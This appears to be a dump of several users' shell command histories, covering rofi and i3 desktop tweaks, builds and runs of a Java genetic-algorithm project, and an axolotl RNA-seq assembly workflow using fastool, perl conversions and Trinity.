-iname 'astrill' +man rofi +rofi -show drun +rofi -show drun -no-custom +rofi -show drun -no-custom -only-match +man rofi +rofi -show run -p ">_" +rofi -show run -display ">_" +rofi -dmenu run +jobs +top +jobs +kill %1 +jobs +rofi -show drun -lines 5 -eh 2 -width 1920 -padding 470 -opacity "90" +rofi -show drun -lines 5 -eh 5 -width 1920 -padding 470 -opacity "90" +rofi -show drun -lines 5 -eh 5 -width 1920 -padding 470 -opacity "90" -font "System San Francisco Display 18" +rofi -show drun -lines 5 -eh 2 -width 1920 -padding 470 -opacity "90" -font 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-load ~/.Xresources +#1473130895 +rofi -show run +#1473130942 +xrdb -load ~/.Xresources +#1473130943 +rofi -show run +#1473130969 +xrdb -load ~/.Xresources +#1473130971 +rofi -show run +#1473131621 +xrdb -load ~/.Xresources +#1473131745 +rofi -show run +#1473132042 +xrdb -load ~/.Xresources +#1473132044 +rofi -show run +#1473132087 +xrdb -load ~/.Xresources +#1473132088 +rofi -show run +#1473132106 +xrdb -load ~/.Xresources +#1473132109 +rofi -show run +#1473132204 +xrdb -load ~/.Xresources +#1473132205 +rofi -show run +#1473132223 +xrdb -load ~/.Xresources +#1473132224 +rofi -show run +#1473132244 +xrdb -load ~/.Xresources +#1473132245 +rofi -show run +#1473132466 +xrdb -load ~/.Xresources +#1473132467 +rofi -show run +#1473132537 +xrdb -load ~/.Xresources +#1473132539 +rofi -show run +#1473132567 +xrdb -load ~/.Xresources +#1473132568 +rofi -show run +#1473132588 +xrdb -load ~/.Xresources +#1473132589 +rofi -show run +#1473132632 +xrdb -load ~/.Xresources +#1473132633 +rofi -show run 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-load ~/.Xresources +#1473134222 +rofi -show run +#1473134396 + +#1473134478 +rofi -show run +#1473134547 +xrdb -load ~/.Xresources +#1473134548 +rofi -show run +#1473134757 +pkill compton +#1473134766 +rofi -show run +#1473134859 +xrdb -load ~/.Xresources +#1473134861 +rofi -show run +#1473134895 +xrdb -load ~/.Xresources +#1473134896 +rofi -show run +#1473134931 +xrdb -load ~/.Xresources +#1473134932 +rofi -show run +#1473134954 +xrdb -load ~/.Xresources +#1473134955 +rofi -show run +#1473135711 +xrdb -load ~/.Xresources +#1473135712 +rofi -show run +#1473135837 +rofi -show drun +#1473135899 +xrdb -load ~/.Xresources +#1473135901 +rofi -show drun +#1473135941 +xrdb -load ~/.Xresources +#1473135942 +rofi -show drun +#1473136069 +history | grep dpkg +#1473136140 +source history +#1473136149 +source .bashrc +#1473136151 +history | grep dpkg +#1473136228 +ls -rt +#1473136305 +dpkg -P rofi +#1473136309 +sudo dpkg -P rofi +#1473136332 +rofi -show drun +#1473136462 +sudo apt install rofi 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~/.config/i3/config +#1473137490 +vim .Xresources +#1473150640 +find ~ -iname "i3blocks.conf" +#1473151048 +feh --bg-scale ~/Pictures/wallpaper_colorful.jpg +#1473150505 +vim ~/.config/i3/config +#1473150656 +vim ~/i3blocks.conf +#1473150707 +vim ~/.config/i3/config +#1473152947 +cp raphaelicons-webfont.ttf ~/.fonts/ +#1473160002 +gsettings set org.gnome.desktop.background show-desktop-icons true +#1473160015 +gsettings set org.gnome.desktop.background show-desktop-icons false +#1473160068 +gsettings set org.gnome.desktop.background show-desktop-icons true +#1473160072 +gsettings set org.gnome.desktop.background show-desktop-icons false +#1473162558 +vim ~/i3blocks.conf +#1473162052 +vim ~/.config/i3/config +#1473172961 +sudo poweroff +#1473203994 +ls -al +#1473204029 +rm -r xware* +#1473204033 +ls -al +#1473204045 +rm google* +#1473204047 +ls -al +#1473204050 +la +#1473204053 +ls -al +#1473204068 +rm david* +#1473204071 +ls -al +#1473204083 +rm David*, curry* +#1473204092 +rm -r David*, curry* +#1473204106 +rm -r David* +#1473204109 +ls -al +#1473204119 +rm -r XwareDesktop/ +#1473204136 +ls -al +#1473204171 +rm -r 土地* +#1473204176 +ls -al +#1473205612 +ifconfig -a +#1473205831 +#1473205834 +ls -al +#1473205846 +touch network +#1473205854 +sudo touch network +#1473205858 +ls -al +#1473205868 +sudo vim network +#1473205879 +ls -al +#1473205890 +chmod +x network +#1473205894 +sudo chmod +x network +#1473205896 +ls -al +#1473203945 +sudo apt update +#1473203972 +sudo apt upgrade +#1473204671 +#1473204674 +ls -al +#1473204682 +cat wifi +#1473204700 +ls -al +#1473204729 +cat bandwidth +#1473204752 +#1473204773 +ls /etc/i3 +#1473204789 +vim i3blocks.conf +#1473206864 +#1473206870 +cat /sys/class/net/etho +#1473206909 +#1473206912 +#1473206920 +ls -al +#1473210475 +cp social-icon-font.ttf ~/.fonts/ +#1473210958 +fc-cache -f -v +#1473212480 +ls .fonts +#1473218049 + +#1473218450 +apt-cache policy scrot +#1473218585 +sudo apt install ksnapshot +#1473218626 +ksnapshot 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$$' +#1473251170 + PROMPT_COMMAND=${PROMPT_COMMAND:+$PROMPT_COMMAND; }'pwd>&8;kill -STOP $$' +#1473251493 + PROMPT_COMMAND=${PROMPT_COMMAND:+$PROMPT_COMMAND; }'pwd>&8;kill -STOP $$' +#1473251511 + PROMPT_COMMAND=${PROMPT_COMMAND:+$PROMPT_COMMAND; }'pwd>&8;kill -STOP $$' +#1473251545 + PROMPT_COMMAND=${PROMPT_COMMAND:+$PROMPT_COMMAND; }'pwd>&8;kill -STOP $$' +#1473251545 + cd "`printf "%b" '\0057home\0057damon\0057\0056config\0057mc'`" +#1473251694 + PROMPT_COMMAND=${PROMPT_COMMAND:+$PROMPT_COMMAND; }'pwd>&8;kill -STOP $$' +#1473251694 + cd "`printf "%b" '\0057home\0057damon\0057\0056config\0057mc'`" +#1473251717 + PROMPT_COMMAND=${PROMPT_COMMAND:+$PROMPT_COMMAND; }'pwd>&8;kill -STOP $$' +#1473251717 + cd "`printf "%b" '\0057home\0057damon\0057\0056config\0057mc'`" +#1473251732 + PROMPT_COMMAND=${PROMPT_COMMAND:+$PROMPT_COMMAND; }'pwd>&8;kill -STOP $$' +#1473251732 + cd "`printf "%b" '\0057home\0057damon\0057\0056config\0057mc'`" +#1473251746 + PROMPT_COMMAND=${PROMPT_COMMAND:+$PROMPT_COMMAND; }'pwd>&8;kill -STOP $$' +#1473251927 +gvf +#1473252078 +[<0;52;48M +#1473252088 + cd "`printf "%b" '\0057home\0057damon\0057mydata'`" +#1473252097 + cd "`printf "%b" '\0057home\0057damon\0057mydata\0057video'`" +#1473252275 + cd "`printf "%b" '\0057home\0057damon'`" +#1473252310 + cd "`printf "%b" '\0057home\0057damon\0057mydata'`" +#1473252315 + cd "`printf "%b" '\0057home\0057damon\0057mydata\0057video'`" +#1473252322 + cd "`printf "%b" '\0057home\0057damon\0057mydata\0057video\0057mcdirtest1'`" +#1473252324 + cd "`printf "%b" '\0057home\0057damon\0057mydata\0057video'`" +#1473253036 + cd "`printf "%b" '\0057home\0057damon\0057mydata\0057video\0057mcdirtest1'`" +#1473253038 + cd "`printf "%b" '\0057home\0057damon\0057mydata\0057video'`" +#1473253038 + cd "`printf "%b" '\0057home\0057damon\0057mydata\0057video\0057mcdirtest1'`" +#1473253039 + cd "`printf "%b" '\0057home\0057damon\0057mydata\0057video'`" +#1473253039 + cd "`printf "%b" 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+mkdir result12 +mkdir result13 +mkdir result14 +mkdir result15 +mkdir result16 +mkdir result17 +mkdir result18 +mkdir result19 +mkdir result20 +clear +ls +ls +clear +ls +vim src/genetic/Main.java +clear +ant +vim src/genetic/Main.java +clear +ant +java -jar bin/jar/genetic.jar data +clear +ls +vim src/genetic/Main.java +clear +ant +vim src/genetic/Main.java +clear +ant +vim src/genetic/Main.java +clea +rant +c;ear +clear +ant +vim src/genetic/Main.java +clear +ls +ls +clear +ls -al +clear +git add . +git add --all. +git add --all . +clear +git commit -m "tmp" +git push origin master +clear +ls +ls +clear +ls +cp -R genetic/ .genetic +ls +clear +ls +vim src/genetic/Main.java +clear +ant +vim src/genetic/Main.java +clear +ant +vim src/genetic/Main.java +clear +abt +ant +vim src/genetic/Main.java +clear +ant +java -jar bin/jar/genetic.jar data +clear +ls +mkdir result/result0 +clear +ls +ls +ls -R +vim result1/generation_1st_0.csv +clear +ls +clear +ls +vim result1/generation_1st_0.csv +java -jar bin/jar/genetic.jar data +ls +ls -R result +vim src/genetic/Main.java +clear +ant +java -jar bin/jar/genetic.jar data +clear +ls +ls -R result +clear +vim src/genetic/Main.java +clear +ant +java -jar bin/jar/genetic.jar data +ps -al +clear +bg +ls +ps -al +clear +ls +ls -R result +clear +ls +ps -al +kill 5414 +kill 5707 +ls +clear +ls +nohup java -jar bin/jar/genetic.jar data & +ls +clear +ls -R result +clear +cat nohup.out +ls -R result +ps -al +clear +ls +cat nohup.out +ps -al +cat nohup.out +ls -R result +clear +ls -R result +clear +cat nohup.out +vim result/result0/generation_1st_7.csv +vim result/result0/generation_1st_9.csv +clear +ls +cat nohup.out +ls -R result +cat nohup.out +ls -R result +ps -al +clear +ls +ps -al +kill 5414 +kill 5786 +ls +clear +vim src/genetic/Main.java +clear +ant +java -jar bin/jar/genetic.jar data +vim src/genetic/Main.java +clear +ant +vim src/genetic/Main.java +clea +rant +ant +clear +java -jar bin/jar/genetic.jar data +clear +ls +java -jar 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java -jar bin/jar/genetic.jar data & +clear +ls +ps -al +clear +cat nohup.out +clear +ls -R result +clear +vim src/genetic/Main.java +clear +nohup java -jar bin/jar/genetic.jar data & +clear +ls +vim src/genetic/Main.java +clear +ant +nohup java -jar bin/jar/genetic.jar data & +clear +vim src/genetic/Main.java +clear +ant +nohup java -jar bin/jar/genetic.jar data & +clear +ls -R result +vim src/genetic/Main.java +clear +ant +nohup java -jar bin/jar/genetic.jar data & +clear +ls -R result +clear +ls -R result +clear +ls +ls -R result +cat nohup.out +clear +ls -R result +clear +ls -R result +clear +ls -R result +clear +ls -R result +clear +cat nohup.out +clear +ls +ps -al +clear +ps -al +clear +cat result +ls -R result +clear +ls -R result +clear +cat nohup.out +clear +ls -R result +clear +ls -R result +clear +cat result/result0/generation391.csv +cat result/result0/generation390.csv +cat result/result0/generation391.csv +clear +cat nohup.out +clear +ls -R result +clear +git add . +git add --all . +git commit -m "." +git push origin master +clear +ls +clear +ls +cat result.csv +clear +ls -R result +clear +ls +ls -R result +clear +l +ls +ls ../ +cat ../filter.sh +ls ../trinity_test/ +ls +vi concatAxoFastqFiles.sh +blat +ls +pwd +ls +ls AxoProjectTest/ +ls Axo_J_TC +ls AxoProjectTest/trinity_out_dir/ +ls -ltr AxoProjectTest/trinity_out_dir/ +ls Axo_J_TC/Axo_J_TC_0h/ +ls +mkdir AxoMikeTest +ls -ltr AxoProjectTest/ +ls -ltr AxoProjectTest/trinity_test/ +df -h +ls +mkdir AxoMikeTest/{091113_Axo2PE_Eva,100311_Axo4_Evita} +ls 091113_Axo2PE_Eva +ls 091113_Axo2PE_Eva/s_1_1/ +mkdir AxoMikeTest/091113_Axo2PE_Eva/{s_1_1,s_1_2,s_2_1,s_2_2} +ls AxoMikeTest/100311_Axo4_Evita/{s_1_1,s_1_2,s_2_1,s_2_2} +mkdir 091113_Axo2PE_Eva/{s_1_1,s_1_2,s_2_1,s_2_2} +ls 100311_Axo4_Evita/{s_1_1,s_1_2,s_2_1,s_2_2} +mkdir AxoMikeTest/100311_Axo4_Evita/{s_1_1,s_1_2,s_1_3,s_1_4} +ls +cp trinity/convertFastqToFasta.sh ./trinity/addGreaterThanSign.sh trinity/pairedOneLane_WORKED/concatAxoFastqFiles.sh AxoMikeTest/ +ls +ls AxoMikeTest/ +cp 091113_Axo2PE_Eva/s_1_1/s_1_1.fq.gz AxoMikeTest/091113_Axo2PE_Eva/s_1_1/s_1_1.fq.gz +bg +cp 091113_Axo2PE_Eva/s_1_1/s_1_2.fq.gz AxoMikeTest/091113_Axo2PE_Eva/s_1_2/s_1_2.fq.gz & +cp 091113_Axo2PE_Eva/s_1_2/s_1_2.fq.gz AxoMikeTest/091113_Axo2PE_Eva/s_1_2/s_1_2.fq.gz & +cp 091113_Axo2PE_Eva/s_2_2/s_2_2.fq.gz AxoMikeTest/091113_Axo2PE_Eva/s_2_2/s_2_2.fq.gz & +cp 091113_Axo2PE_Eva/s_2_2/s_2_2.fq.gz AxoMikeTest/091113_Axo2PE_Eva/s_2_1/s_2_1.fq.gz & +fg +ps axuww |grep cp +killall -9 cp +history |grep cp +cp 091113_Axo2PE_Eva/s_1_1/s_1_1.fq.gz AxoMikeTest/091113_Axo2PE_Eva/s_1_1/s_1_1.fq.gz & +fg +bg +cp 091113_Axo2PE_Eva/s_1_2/s_1_2.fq.gz AxoMikeTest/091113_Axo2PE_Eva/s_1_2/s_1_2.fq.gz & +091113_Axo2PE_Eva/s_2_2/s_2_2.fq.gz AxoMikeTest/091113_Axo2PE_Eva/s_2_2/s_2_2.fq.gz & +ls -ltr 091113_Axo2PE_Eva/s_2_2/s_2_2.fq.gz: +history |grep rm +history |grep cp +ls -ltr AxoMikeTest/091113_Axo2PE_Eva/s_1_1/s_1_1.fq.gz +ls -ltr AxoMikeTest/091113_Axo2PE_Eva/s_1_2/s_1_2.fq.gz +ls -ltr AxoMikeTest/091113_Axo2PE_Eva/s_2_2/s_2_2.fq.gz +ls -ltr AxoMikeTest/091113_Axo2PE_Eva/s_2_1/s_2_1.fq.gz +find ./AxoMikeTest/ -name "*.fq.gz" |rm -fr +ls -ltr AxoMikeTest/091113_Axo2PE_Eva/s_2_2/s_2_2.fq.gz +find ./AxoMikeTest/ -name "*.fq.gz" +find ./AxoMikeTest/ -name "*.fq.gz" |xargs rm -fr +find ./AxoMikeTest/ -name "*.fq.gz" +history |grep cp + cp 091113_Axo2PE_Eva/s_1_1/s_1_1.fq.gz AxoMikeTest/091113_Axo2PE_Eva/s_1_1/s_1_1.fq.gz +bg +cp 091113_Axo2PE_Eva/s_1_2/s_1_2.fq.gz AxoMikeTest/091113_Axo2PE_Eva/s_1_2/s_1_2.fq.gz & +cp 091113_Axo2PE_Eva/s_2_2/s_2_2.fq.gz AxoMikeTest/091113_Axo2PE_Eva/s_2_2/s_2_2.fq.gz & +cp 091113_Axo2PE_Eva/s_2_1/s_2_1.fq.gz AxoMikeTest/091113_Axo2PE_Eva/s_2_1/s_2_1.fq.gz & +ls -ltr 091113_Axo2PE_Eva/s_1_2/s_1_2.fq.gz +ls +find ./AxoMikeTest/ -name "*.fq.gz" |xargs ls -l +histtory |grep cp +history |grep cp +ls AxoMikeTest/ +cp 100311_Axo4_Evita/s_1_1/s_1_1.fq.gz AxoMikeTest/100311_Axo4_Evita/s_1_1/s_1_1.fq.gz & +fg +bg +ls -ltr 100311_Axo4_Evita/ +cp 100311_Axo4_Evita/s_2_1/s_1_2.fq.gz AxoMikeTest/100311_Axo4_Evita/s_2_1/s_2_1.fq.gz & +cp 100311_Axo4_Evita/s_2_1/s_2_1.fq.gz AxoMikeTest/100311_Axo4_Evita/s_2_1/s_2_1.fq.gz & +ls --ltr AxoMikeTest/100311_Axo4_Evita/ +ls -ltr AxoMikeTest/100311_Axo4_Evita/ +ls -ltr AxoMikeTest/100311_Axo4_Evita/s_1_2/ AxoMikeTest/100311_Axo4_Evita/s_2_1/ +mv AxoMikeTest/100311_Axo4_Evita/s_1_2/ AxoMikeTest/100311_Axo4_Evita/s_2_1/ +mv AxoMikeTest/100311_Axo4_Evita/s_1_3/ AxoMikeTest/100311_Axo4_Evita/s_3_1/ +mv AxoMikeTest/100311_Axo4_Evita/s_1_4/ AxoMikeTest/100311_Axo4_Evita/s_4_1/ +history |grep cp +cp 100311_Axo4_Evita/s_2_1/s_2_1.fq.gz AxoMikeTest/100311_Axo4_Evita/s_2_1/s_2_1.fq.gz & +cp 100311_Axo4_Evita/s_3_1/s_3_1.fq.gz AxoMikeTest/100311_Axo4_Evita/s_3_1/s_3_1.fq.gz & +cp 100311_Axo4_Evita/s_3_1/s_3_1.fq.gz AxoMikeTest/100311_Axo4_Evita/s_4_1/s_4_1.fq.gz & +fg +ps axuww |grep cp +rm -fr AxoMikeTest/100311_Axo4_Evita/s_4_1/s_4_1.fq.gz +history |grep cp +cp 100311_Axo4_Evita/s_4_1/s_4_1.fq.gz AxoMikeTest/100311_Axo4_Evita/s_4_1/s_4_1.fq.gz & +history |grep mkdir +mkdir AxoMikeTest/100311_Axo4_Evita/{s_8_1,s_7_1,s_6_1,s_5_1} +history |grep cp +cp 100311_Axo4_Evita/s_5_1/s_5_1.fq.gz AxoMikeTest/100311_Axo4_Evita/s_5_1/s_5_1.fq.gz & +cp 100311_Axo4_Evita/s_6_1/s_6_1.fq.gz AxoMikeTest/100311_Axo4_Evita/s_6_1/s_6_1.fq.gz & +cp 100311_Axo4_Evita/s_7_1/s_7_1.fq.gz AxoMikeTest/100311_Axo4_Evita/s_7_1/s_7_1.fq.gz & +cp 100311_Axo4_Evita/s_8_1/s_8_1.fq.gz AxoMikeTest/100311_Axo4_Evita/s_8_1/s_8_1.fq.gz & +history |grep mkdir +ls +ls +ls +cat convertFastqToFasta.sh +vi concatAxoFastqFiles.sh +ls -ltr +ls +ls +ls +ls +ls s_* +ls +ls +find ./ -name "*.gz" |xargs unzip +ls s_1/1 +ls s_1_1 +find ./s_1_1/ -name "*.gz" |xargs gunzip +ls s_1_1 +man gunzip +find ./s_1_1/ -name "*.fq" |xargs gzip +ls s_1_1 +find ./ -name "*.gz" |xargs gunzip -c +ls +ls 091113_Axo2PE_Eva/s_1_1/ +man gunzip +find ./ -name "*.gz" {}\; |xargs cat {}; +find ./ -name "*.gz" {}\; |xargs ls -ltr {}; +find ./ -name "*.gz" |xargs gunzip -c & +fg +man gunzip +man zcat +pwd +find ./ -name "*.gz" |xargs gunzip & +top +ls -ltr +find +find ./ -name "*.fa" +ps axuww |grep find +ls +ps axuww |grep find +fg +bg +ps axuww |grep find +ps axuww |grep gunzip +find ./ -name "*.fa" +find ./ -name "*.fq" +find ./ -name "*.fq" |xargs du -sck +find ./ -name "*.fq.gz" |xargs du -sck +find ./ -name "*.fq.gz" |xargs du -sch +find ./ -name "*.fq" |xargs du -sch +pwd +ls +./concatAxoFastqFiles.sh +ls +tail axo_left.fq.gz +ls -ltr +rm axo_*.gz +ls +./concatAxoFastqFiles.sh +pwd +ls +cat axo_ +cat axo_* +rm axo_*.fq +./concatAxoFastqFiles.sh +ls -ltr +ls rm -fr axo_* +rm -fr axo_* +vi concatAxoFastqFiles.sh ` +:q +vi concatAxoFastqFiles.sh ` +:q +vi concatAxoFastqFiles.sh +ls +pwd +ls +ls 091113_Axo2PE_Eva/ +pwd +ls +pwd +ls +python extract_lines.py +which python +exit +id +pwd +w +exist +ls /isiseqruns/RonAxoTrinity/trinity/mir-36 +ls /isiseqruns/RonAxoTrinity/trinity/mir-36/trinity_out_dir/ +ls -ltr /isiseqruns/RonAxoTrinity/trinity/mir-36/trinity_out_dir/ +ls +ls -ltr trinity/mir-36/trinity_out_dir/ +tail trinity/mir-36/trinity_out_dir/Trinity.timing +ls +ls -ltr +ls AxoProjectTest/ +ls +ls +pwd +ls +cp -a /isitools/Fastool-master/ /isitools/CentOS-5/ +ped +pwd +ls +ls +make clean +ls +cat Makefile +cat fastool.c +ls +make +top +pwd +ls +less Makefile +ls +pwd +which perl +ls +pwd +ls +ls +fastool +./fastool +./fastool --to-fasta test.fastq testMike.fasta +ls +ls -ltr +pwd +ls +ls -ltr +cp test.fastq mike.fastq +ls +ls -ltr +rm testrun1.fasta +./fastool --to-fasta mike.fastq +ls +ls -ltr +./fastool --to-fasta mike.fastq +./fastool --to-fasta mike.fastq > mike.fasta +diff mike.fastq mike.fasta +cat +cat mike.fast* +ls +pwd +ls +/isitools/Fastool-master/fastool --to-fasta axo_left.fq > left.fa & +/isitools/Fastool-master/fastool --to-fasta axo_right.fq > right.fa & +ls -ltr +fg +nohup /isitools/Fastool-master/fastool --to-fasta axo_right.fq > right.fa & +tail nohup.out +ls +ls -ltr +ps auxww |grep fastool +ls -ltr +history + nohup /isitools/Fastool-master/fastool --to-fasta axo_right.fq > right.fa & +ls +ls -ltr +tail right.fa +ls +fg +ls +ls -ltr +cat axo_right.fq | /isitools/Fastool-master/fastool --to-fasta > right.fasta +bg +ls +ls -ltr +fg +rm -fr left.fa right.fa right.fasta +pwd +ls +/isitools/Fastool-master/fastool --to-fasta axo_left.fq.gz > axo_left.fa & +/isitools/Fastool-master/fastool --to-fasta axo_right.fq.gz > axo_right.fa & +ls -ltr +head axo_left.fq +head -n 200 axo_left.fq +ls +ls -ltr +ps auxww |grep fast +pwd +ls +cat axo_left.fq +ls +ls +ls +ls +/isitools/Fastool-master/fastool --to-fasta Axo_J_TC_0h.fq > Axo_J_TC_0h.fa & +ls -ltr +fg +rm -fr Axo_J_TC_0h.fa +ls +ls +ls +ls +ls +ls -ltr +/isitools/Fastool-master/fastool --to-fasta s_1_1.fq.gz > s_1_1.fa +bg +ls -ltr +rm -fr *.fa +pwd +ls +gunzip s_1_1.fq.gz +bg +ls -ltr +ps auxww |grep gunz +ls +ls -ltr s_1_1.fq +/isitools/Fastool-master/fastool --to-fasta s_1_1.fq > s_1_1.fa +bg +ls -ltr +rm -fr s_1_1.f +rm -fr s_1_1.fa +ls +tar zcf s_1_1.fq +tar zfc s_1_1.fq +tar +tar --help +tar zcf s_1_1.fq.gz s_1_1.fq +bg +ls -ltr +head s_1_1.fq +tail s_1_1.fq +ls +ls -ltr +ls +ls -ltr +pwd +ls +ls +head Axo_J_TC/Axo_J_TC_0h/Axo_J_TC_0h.fq +pwd +head /isiseqruns/RonAxoTrinity/091113_Axo2PE_Eva/s_1_1/s_1_1.fq +head Axo_J_TC/Axo_J_TC_0h/Axo_J_TC_0h.fq +ls -ltr +pwd +ls +ls +ls +ls +perl -pe 's|@|>|;s|.*||s if $.%4==3 || $.%4==0;close $ARGV if eof' axo_right.fq > axo_right.fa & +perl -pe 's|@|>|;s|.*||s if $.%4==3 || $.%4==0;close $ARGV if eof' s_1_1.fq > s_1_1.fa & +ls -ltr +pwd +ls +ls -ltr +rm -fr axo_*.fa +ls +perl -pe 's|@|>|;s|.*||s if $.%4==3 || $.%4==0;close $ARGV if eof' axo_right.fq > axo_right.fa & +ls +ls -ltr +perl -pe 's|@|>|;s|.*||s if $.%4==3 || $.%4==0;close $ARGV if eof' axo_left.fq > axo_left.fa & +ls -ltr +ps axuww |grep perl +ls -ltr +tail -f nohup.out +ls +ls -ltr +ls -ltr mir-3 +ls -ltr mir-36/ +ls -ltr mir-36/trinity_out_dir/ +rm -fr mir-36/trinity_out_dir/ +ls +tail -f nohup.out +ls -ltr +top +ps axuww|grep Trinity +rm -fr mir-36/trinity_out_dir/ +ls 0ltr +ls -ltr +ls -ltr mir-36/trinity_out_dir/ +tail -f mir-36/trinity_out_dir/both.fa +top +top -d 5 +ifconfig +pwd +echo $HOME +ls -ltr /isitools/.cpan/build/ +ls +perl Build.PL +ls +perl Build +ls +echo $HOME +ls ~/.cpan/build/ +ls -ltr ~/.cpan/build/ +pwd +ls +ls +pwd +ls +pwd +ls +vi mv concatAxoFastqFilesLaneOneOnly.sh concatAxoFastqFilesLaneOneOnlyPairedEnd.sh +cp concatAxoFastqFilesLaneOneOnly.sh concatAxoFastqFilesLaneOneOnlyPairedEnd.sh +ls +ls -ltr +pwd +ls +mv concatAxoFastqFilesLaneOneOnly.sh concatAxoFastqFilesLaneOneSingle.sh +pwd +ls +ls -ltr +ls -ltr ../ +mv concatAxoFastqFiles.sh concatAxoFastqFilesLaneOneOnly.sh +mv concatAxoFastqFilesLaneOneOnly.sh singleAndPairedEndTogether/concatAxoFastqFiles.sh +ls -ltr +mv concatAxoFastqFilesLaneOneOnlyPairedEnd.sh singleAndPairedEndTogether/ +ls +ls +ls +ls -ltr +ls +pwd +ls +cat concatAxoFastqFiles.sh +ls +cat concatAxoFastqFilesLaneOneOnlyPairedEnd.sh +concatAxoFastqFilesLaneOneOnlyPairedEnd.sh +vi concatAxoFastqFilesLaneOneOnlyPairedEnd.sh +concatAxoFastqFilesLaneOneOnlyPairedEnd.sh +vi concatAxoFastqFiles.sh +ls -ltr +vi concatAxoFastqFiles.sh +ls -ltr +ls +ls +vi concatAxoFastqFilesLaneOneSingle.sh +pwd +ps axuww |grep perl +ls -ltr /isiseqruns/RonAxoTrinity/trinity/mir-36/trinity_out_dir +head /isiseqruns/RonAxoTrinity/trinity/mir-36/trinity_out_dir/both.fa +ls +ls -ltr +ls +rm -fr trinity_out_dir/ +ls +pwd +ls +ls +pwd +ls +ls -ltr +pwd +ls -ltr +ls -ltr ../mir-36/trinity_out_dir/ +pwd +ls -ltr +ls -ltr ../mir-36/trinity_out_dir/ +top +history +history|grep Trinity.pl +top +pwd +ls +ls -ltr +cat axo_left.fa axo_right.fa |wc -l +pwd +ls +ls -ltr +top +ls +sl +ls -ltr +pwd +ls +ls -ltr +ls +ls -ltr +tail nohup.out +cat nohup.out +head nohup.out +ls +rm nohup.out axo* +ls +vi concatAxoFastqFiles.sh +ls -ltr +ls -ltr +ls singleOnlyOneLaneTest/ +ls +history |grep Trinity.pl +ls +/isitools/trinity/Trinity.pl --seqType fq --JM 256G -single ./axo_left.fq.gz --CPU 60 --bflyHeapSpaceMax 2G --bflyCPU 16 --output /isiseqruns/RonAxoTrinity/trinity/singleOnlyOneLaneTest/ & +ls -ltr +sudo chown -R mikec ../singleOnlyOneLaneTest/ +ls -lr +/isitools/trinity/Trinity.pl --seqType fq --JM 256G -single ./axo_left.fq.gz --CPU 60 --bflyHeapSpaceMax 2G --bflyCPU 16 --output /isiseqruns/RonAxoTrinity/trinity/singleOnlyOneLaneTest/ & +tail -f no +fg +nohup /isitools/trinity/Trinity.pl --seqType fq --JM 256G -single ./axo_left.fq.gz --CPU 60 --bflyHeapSpaceMax 2G --bflyCPU 16 --output /isiseqruns/RonAxoTrinity/trinity/singleOnlyOneLaneTest/ & +tail -f nohup.out +fg +bg +tail -f nohup.out +ls -ltr +tail -f nohup.out +history |grep Trinity.pl +tail -f nohup.out +fg +bg +pwd +ls -ltr +tail -f nohup.out +ls -tlr +find ../ -iname "*convert*" +cat ../convertFastqToFasta.sh +pwd +ls -ltr +pwd +mv axo_left.fq single.fa +ls -ltr +rm single.fa.read_count +ls -ltr +rm -fr chrysalis/ +ls +history |grep Trinity.pl +cat ../convertFastqToFasta.sh +mv single.fa single.fq +perl -pe 's|@|>|;s|.*||s if $.%4==3 || $.%4==0;close $ARGV if eof' single.fq > single.fa & +head single.fa +history |grep perl +history |grep perl |grep ">" +ls -ltr +fg +bg +ls +ls -ltr +fg +bg +ls -ltr +cat ../addGreaterThanSign.sh +head single.f +head single.fa +perl -p -i -e "s/HWI-/\>HWI-/g" single.fa & +head single.f +head single.fa +ls -ltr +fg +bg +ls -ltr +head single.f +head single.fa +ls +rm Trinity.timing +ls +history |grep Trinity.pl +nohup /isitools/trinity/Trinity.pl --seqType fq --JM 256G -single ./single.fa --CPU 60 --bflyHeapSpaceMax 2G --bflyCPU 16 --output /isiseqruns/RonAxoTrinity/trinity/singleOnlyOneLaneTest/ & +tail -f nohup.out +pwd +tail -f nohup.out +fg +bg +ls -ltr +history |grep Trinity.pl +tail -f nohup.out +history |grep Trinity.pl +tail -f nohup.out +fg +ls +rm -fr single.fa.read_count Trinity.timing chrysalis/ no +ls +rm -fr chrysalis/ nohup.out Trinity.timing +ls +history |grep Trinity +ps axuww |grep Trinity +kill -9 8678 8939 +ps axuww |grep Trinity +ps axuww |grep perl +ps axuww |grep Trinity +pwd +ps axuww |grep Trinity +pwd +ls -ltr +tail -f nohup.out +ls +grep "HWI-" both.fa +grep "s_1_" both.fa +history |grep grep +top +pwd +fg +pwd +ls +vi concatAxoFastqFiles.sh +ls +vi concatAxoFastqFiles.sh +ls +vi extract_lines.py +ls +ls 091113_Axo2PE_Eva/s_1_1/ +ls +python countReads.py +head 091113_Axo2PE_Eva/s_1_1/s_1_1.fq +ls +head 091113_Axo2PE_Eva/s_1_1/s_1_1.fq +head 091113_Axo2PE_Eva/s_1_2/s_1_2.fq +history |grep gunzip +head 091113_Axo2PE_Eva/s_1_2/s_1_2.fq +head 091113_Axo2PE_Eva/s_1_1/s_1_1.fq +locate fasttool +ls +ls /isitools/ +ls /isitools/Fastool-master/ +ls /isitools/Fastool-master/fastool +/isitools/Fastool-master/fastool --help +/isitools/Fastool-master/fastool +ls +locate fastx +locate read_fastq +ls +vi extract_lines.py +vi listDirectories.py +python listDirectories.py > listFiles.txt +vi listDirectories.py +ls +pwd +ls ../ +ls ../trinity/singleOneLane/ + ls -ltr ../trinity/singleOneLane/axo_left.fq.gz +head ax +head axo +ls +pwd +ls +ls -ltr +vi ../trinity/singleOneLane/concatAxoFastqFiles.sh +tail ../trinity/singleOneLane/ +tail ../trinity/singleOneLane/nohup.out +ls -ltr ../trinity/singleOneLane/ +cat ../trinity/singleOneLane/nohup.out |wc -l +cat ../trinity/singleOneLane/nohup.out +vi ../trinity/singleOneLane/concatAxoFastqFiles.sh +cat ../trinity/singleOneLane/nohup.out +pwd +ls +ls -ltr +rm axo_left.fq.gz +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +fg +pwd +nohup ./concatAxoFastqFiles.sh & ; tail -f nohup.out +fg +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +fg +cat nohup.out +ls -ltr ../../100301_AxoTC1_Wandae/s_1_1/ +gzip ../../100301_AxoTC1_Wandae/s_1_1/s_1_1.fq +bg +ls -ltr ../../100301_AxoTC1_Wandae/s_1_1/ +grep "No such file" nohup.out +ls -ltr ../../100301_AxoTC1_Wandae/s_1_1/ +ls +ls -ltr ../../100301_AxoTC1_Wandae/s_1_1/ +man tar +ls -ltr +lfs -ltr +ls -ltr +pwd +rm single.fq.gz nohup.out +nohup concatAxoFastqFiles.sh & +pwd +ls +pwd +ls +cat nohup.out +rm nohup.out +nohup ./concatAxoFastqFiles.sh & 